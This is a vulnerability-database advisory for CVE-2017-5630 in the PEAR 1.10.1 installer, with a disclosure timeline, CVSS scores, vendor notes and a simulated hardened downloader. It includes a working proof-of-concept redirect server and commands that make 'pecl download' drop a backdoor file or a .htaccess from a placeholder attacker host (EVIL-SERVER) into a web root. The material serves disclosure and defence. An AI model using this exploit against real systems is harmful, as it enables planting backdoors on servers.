ID: SSV:92633   Type: seebug   Reporter: Root   Modified: 2017-02-01T00:00:00
Title: PHP PEAR 1.10.1 - Arbitrary File Download Vulnerability (CVE-2017-5630)
Description
Author: mapl0
Vulnerability details
The download utility in the installer of PEAR Base System 1.10.1 does not validate the file type or the file name after following an HTTP redirect. A remote HTTP server can therefore use a crafted response to overwrite files on the machine that issued the request, for example .htaccess. The vulnerability is triggered when the victim runs `pecl download`.
pear does not rename the downloaded (invalid) file back to the originally requested, safe file name. An attacker can therefore overwrite an existing file or drop a backdoor, provided the pecl request is made from a web-accessible directory.
Moreover, pecl does not delete a file obtained this way, which gives the attacker time to reach the backdoor file (for instance by keeping the HTTP connection open) before the invalid-file message is noticed.
POC Video: https://vimeo.com/201341280 (the original recording). https://pan.baidu.com/s/1dFaHTxZ (my own recording; the picture quality is a bit poor).
Point to prove:
This PoC involves three machines: the victim, which issues the pecl download command; VULN-SERVER, which receives the file download request and whose HTTP response the attacker controls; and EVIL-SERVER, which hosts the PHP backdoor, .htaccess file or other payload that the attacker wants written to disk.
1) The victim machine attempts to download a legitimate .tgz archive:
pecl download http://VULN-SERVER:8080/Test.tgz
2) VULN-SERVER receives the request for Test.tgz and answers with a 302 redirect to EVIL-SERVER.
3) pecl follows the redirect and, without noticing, downloads the Evil.php backdoor from EVIL-SERVER.
On EVIL-SERVER the attacker serves the directory holding the payload:
python -m SimpleHTTPServer 8888
On VULN-SERVER the attacker runs PECL-File-Exploit.py:
python PECL-File-Exploit.py
import socket

HOST = 'localhost'                    # interface the fake VULN-SERVER listens on
PORT = 8080
TARGET = 'http://EVIL-SERVER:8888/'   # server hosting the real payload
FILE = '.htaccess'                    # name pecl will write into its current directory

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(10)

print('Waiting for PECL connections...')

while True:
    conn, addr = s.accept()
    junk = conn.recv(512)             # discard the "GET /Test.tgz" request
    # Answer every request with a redirect; pecl follows it and keeps the
    # redirected file name instead of the one it was asked for.
    conn.send(b'HTTP/1.1 302 Found\r\n')
    conn.send(('Location: ' + TARGET + FILE + '\r\n\r\n').encode())
    conn.close()
s.close()
When the victim now requests Test.tgz, pecl follows the redirect and writes the file under the name the attacker chose (the transcript below was taken with FILE set to Evil.php instead of .htaccess):
C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
.....done: 4,665 bytes
File C:\xampp\htdocs\webapp\Evil.php downloaded
The backdoor is left in the current directory, here the web root C:\xampp\htdocs\webapp, where it is reachable over HTTP.
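The following Python is an added example, not code from the original advisory or from PEAR itself. It models the three-machine flow of the PoC above and the fix the advisory implies (write the file under the originally requested name, and validate it) with a constructed in-memory table of HTTP responses in place of a real network: vuln-server redirects Test.tgz to a .htaccess payload on evil-server, and mirror.example serves a clean archive. `vulnerable_download` names the file after the final URL, as PEAR 1.10.1 does; `hardened_download` pins the name to the requested one, rejects hidden names, path characters and non-archive extensions, checks the gzip signature (an extra check beyond what the advisory describes), and refuses to overwrite an existing file. The host names, responses, and function names are assumptions made for the example.

```python
import os
import posixpath
import tempfile
from urllib.parse import urlsplit

# Constructed in-memory "network" standing in for the three machines of the
# PoC: URL -> (status, headers, body).  vuln-server answers the request for
# Test.tgz with a 302 to evil-server, which serves a .htaccess payload.  A
# clean mirror is included for the happy path.  All of this data is made up.
FAKE_NET = {
    'http://vuln-server:8080/Test.tgz':
        (302, {'Location': 'http://evil-server:8888/.htaccess'}, b''),
    'http://evil-server:8888/.htaccess':
        (200, {}, b'AddType application/x-httpd-php .txt\n'),
    'http://mirror.example/get/Test.tgz':
        (200, {}, b'\x1f\x8b\x08\x00' + b'\x00' * 12),  # gzip magic + filler
}

REDIRECTS = (301, 302, 303, 307, 308)
ALLOWED_EXT = ('.tgz', '.tar.gz', '.tar')


def fetch(url):
    """Stand-in for an HTTP GET against the constructed network."""
    return FAKE_NET.get(url, (404, {}, b''))


def follow(url, max_hops=5):
    """Follow redirects the way an HTTP client does; return (final_url, body)."""
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        if status in REDIRECTS and 'Location' in headers:
            url = headers['Location']
            continue
        if status != 200:
            raise IOError('HTTP %d for %s' % (status, url))
        return url, body
    raise IOError('too many redirects')


def vulnerable_download(url, dest_dir):
    """PEAR 1.10.1 behaviour: the on-disk name comes from the *final* URL,
    so a redirecting server decides what gets written into dest_dir."""
    final_url, body = follow(url)
    name = posixpath.basename(urlsplit(final_url).path)  # attacker-controlled
    path = os.path.join(dest_dir, name)
    with open(path, 'wb') as f:
        f.write(body)
    return path


def safe_archive_name(requested_url):
    """Derive the on-disk name from the URL the *user* asked for and reject
    anything that is not a plain archive file name."""
    name = posixpath.basename(urlsplit(requested_url).path)
    if not name or name.startswith('.'):
        raise ValueError('refusing hidden or empty file name %r' % name)
    if '/' in name or '\\' in name or '\x00' in name:
        raise ValueError('refusing path characters in %r' % name)
    if not name.lower().endswith(ALLOWED_EXT):
        raise ValueError('not an archive name: %r' % name)
    return name


def hardened_download(url, dest_dir):
    """Keep the requested name, require a gzip payload, and never overwrite
    an existing file in dest_dir (O_EXCL)."""
    name = safe_archive_name(url)            # decided before any network I/O
    final_url, body = follow(url)
    if not body.startswith(b'\x1f\x8b'):     # gzip signature check
        raise ValueError('%s did not return a gzip archive' % final_url)
    path = os.path.join(dest_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, 'wb') as f:
        f.write(body)
    return path


def demo():
    """Run both downloaders against the PoC URL in a scratch web root.
    Returns (name the vulnerable client wrote, error the hardened client
    raised, name the hardened client wrote for the clean mirror)."""
    webroot = tempfile.mkdtemp(prefix='htdocs-')
    dropped = os.path.basename(
        vulnerable_download('http://vuln-server:8080/Test.tgz', webroot))
    try:
        hardened_download('http://vuln-server:8080/Test.tgz', webroot)
        blocked = None
    except ValueError as e:
        blocked = str(e)
    clean = os.path.basename(
        hardened_download('http://mirror.example/get/Test.tgz', webroot))
    return dropped, blocked, clean


if __name__ == '__main__':
    print(demo())
```

Running `demo()` writes `.htaccess` into the scratch directory through the vulnerable path, while the hardened path refuses the redirected payload and only ever creates `Test.tgz`. Pinning the name alone is not enough if the attacker serves a valid archive under the redirect, which is why the content check and the O_EXCL open are part of the hardened version; authenticity of the archive itself (signatures or pinned hashes) is a separate problem that this example does not address.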
Personal summary: the conditions for exploitation are harsh: the victim has to run pecl from inside the web directory, and the target URL has to point at the attacker's server. Combined with phishing on a social networking site, however, the danger is still considerable.
Disclosure Timeline:
Vendor Notification: January 11, 2017
Informed "PECL package no longer maintained": January 23, 2017
Opened Bug #2117: January 25, 2017
Public Disclosure: January 29, 2017
CVE Reference: CVE-2017-5630 (CWE-74); affected product cpe:2.3:a:php:pear:1.10.1
NVD description: PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
CVSS v3.1: 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVSS v2: 5.0 Medium (AV:N/AC:L/Au:N/C:N/I:P/A:N)

Original advisory: John Page AKA hyp3rlinx (ISR: ApparitionSEC), http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
Vendor: pear.php.net
Product: PEAR Base System v1.10.1, PEAR Installer's download utility
Vulnerability Type: Arbitrary File Download
Network Access: Remote
Severity: High

Distribution notes:
Red Hat (CVE-2017-5630): This vulnerability only allows files in the current directory to be overwritten, so using `pear download` in a temporary directory effectively mitigates the risk of a dangerous file overwrite occurring.
Ubuntu (CVE-2017-5630), upstream bug http://pear.php.net/bugs/bug.php?id=21171:
sbeattie: PEAR issues should go against php-pear as of xenial
seth-arnold: PEAR/PECL appears to have no authenticity checks of any sort. As far as I can tell any malicious MITM can install whatever they want anyway.
leosilva: unfixed as of 2020-11-23

References:
https://www.seebug.org/vuldb/ssvid-92633
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5630
https://www.exploit-db.com/exploits/41185 (EDB-ID:41185)
https://packetstormsecurity.com/files/140796/PEAR-Arbitrary-File-Download.html
https://0day.today/exploit/26851
https://security-tracker.debian.org/tracker/CVE-2017-5630
https://access.redhat.com/security/cve/cve-2017-5630
https://ubuntu.com/security/CVE-2017-5630